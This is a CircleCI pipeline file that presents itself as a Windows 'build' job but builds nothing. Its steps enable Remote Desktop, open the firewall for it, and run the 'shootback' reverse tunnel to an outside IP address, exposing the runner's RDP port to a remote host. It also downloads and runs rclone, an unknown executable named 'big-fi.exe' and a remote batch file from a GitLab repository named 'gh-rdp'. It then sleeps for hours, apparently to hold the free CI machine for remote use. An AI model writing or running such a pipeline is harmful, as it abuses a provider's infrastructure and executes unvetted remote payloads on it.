version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
    steps:
      - run:
          name: "Step1"
          command: |
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
            Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
            
      - run:
          name: "Step2"
          command: |
            git clone https://github.com/aploium/shootback
            Start-Process Powershell -ArgumentList '-Noexit -Command "python shootback\slaver.py -m 162.0.238.254:35020 -t 127.0.0.1:3389"'

      - run:
          name: "Setup rclone"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/rclone.zip -OutFile C:\rclone.zip
            Expand-Archive C:\rclone.zip -DestinationPath C:\rclone
            Start-Process Powershell -ArgumentList '-Noexit -Command "C:\rclone\rclone config --config=\"C:\rclone\rclone.conf\""'
            C:\rclone\rclone copy dev:bas/bigfi.zip C:\bas
            # Expand-Archive C:\bas\bigfi.zip -DestinationPath "$env:LOCALAPPDATA\\bas"
            Expand-Archive C:\bas\bigfi.zip -DestinationPath C:\Users\root\AppData\Local\bas
            C:\Users\root\AppData\Local\bas\bigfi\big-fi.exe
      - run:
          name: "Step3"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/start2.sh -OutFile start.bat
            # Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/bigfi.zip -OutFile C:\bigfi.zip
            # Expand-Archive C:\bigfi.zip -DestinationPath C:\
            cmd /c start.bat
            Start-Sleep -s 99999
          no_output_timeout: 10h
